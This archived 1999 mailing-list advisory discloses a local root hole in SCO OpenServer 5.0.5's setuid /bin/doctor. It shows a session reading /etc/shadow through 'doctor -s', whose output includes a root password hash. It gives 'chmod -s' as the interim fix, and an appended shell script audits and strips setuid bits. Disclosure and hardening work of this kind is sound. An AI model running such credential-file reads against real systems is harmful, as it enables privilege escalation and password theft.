SCO OpenServer 5.0.5 /bin/doctor root compromise

From: Brock Tellier (btellierat_private)
Date: Tue Sep 07 1999 - 08:44:42 PDT

    Greetings,
    
    
    INFO:
     There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and
    probably others.  By supplying a doctor script file you can read the
    first partial line of any file on the system (good enough for
    /etc/shadow).  Example:
    
    scobox:/bin$ id
    uid=136(btellier),200(users)
    scobox:/bin$ uname -a
    SCO_SV scobox 3.2 5.0.5 i386
    scobox:/bin$ doctor -V
    doctor 2.0.0e 2
    scobox:/bin$ doctor -s /etc/shadow
    doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
    scobox:/bin$
    
    And so on.
    
    FIX:
     Just chmod -s until SCO comes out with a fix.  Although I certainly
    won't be changing it back to suid root anytime soon.  If a hole like
    this exists, there are undoubtedly countless more lurking within.
    
    Brock Tellier
    Systems Administrator
    Webley Systems
    

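The interim fix in the post is `chmod -s` on the binary. As an added example (not from the original post or from SCO), the script below shows the defender's side of that workflow: list setuid files, strip the bit and verify it is really gone, and later detect any file that has regained a setuid bit, as a reinstalled package might. The `doctor` file in the demo is an empty placeholder created in a temp directory, not the SCO binary.

```shell
#!/bin/sh
# Added example, not part of the original post: audit setuid files, apply the
# interim "chmod -s" mitigation to one binary and verify it took, and detect a
# binary that regains its setuid bit later (e.g. after a vendor reinstall).
# Uses only POSIX find/test/chmod/comm; mktemp -d is assumed available.

# setuid_list DIR: sorted paths of every setuid file below DIR (one filesystem).
# Add -user root when only setuid-root binaries are of interest.
setuid_list() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_setuid PATH: succeed if the set-user-ID bit is on (POSIX test -u).
is_setuid() { [ -u "$1" ]; }

# strip_setuid PATH: the interim fix from the post. Clears set-user-ID and
# set-group-ID bits and fails unless the bit is verifiably gone afterwards.
strip_setuid() {
    chmod u-s,g-s "$1" && ! is_setuid "$1"
}

# setuid_new BASELINE DIR: paths that are setuid now but absent from the
# BASELINE listing produced earlier by setuid_list (the "it came back" check).
setuid_new() {
    setuid_list "$2" | comm -13 "$1" -
}

# demo: constructed scenario in a temp dir standing in for /bin; "doctor" is an
# empty placeholder file, not the SCO binary. Succeeds if the workflow behaves.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/doctor"; : > "$d/other"
    chmod 4755 "$d/doctor"; chmod 755 "$d/other"
    setuid_list "$d" > "$d/.baseline"      # baseline taken while doctor is setuid
    strip_setuid "$d/doctor" || return 1   # apply chmod -s and verify
    chmod u+s "$d/other"                   # simulate a bit appearing afterwards
    regained=$(setuid_new "$d/.baseline" "$d")
    rm -rf "$d"
    [ "$regained" = "$d/other" ]           # only the new setuid file is reported
}
```

Re-run `setuid_new` against a saved baseline after every package or patch installation; the mitigation only holds as long as the bit stays off.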


    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:27 PDT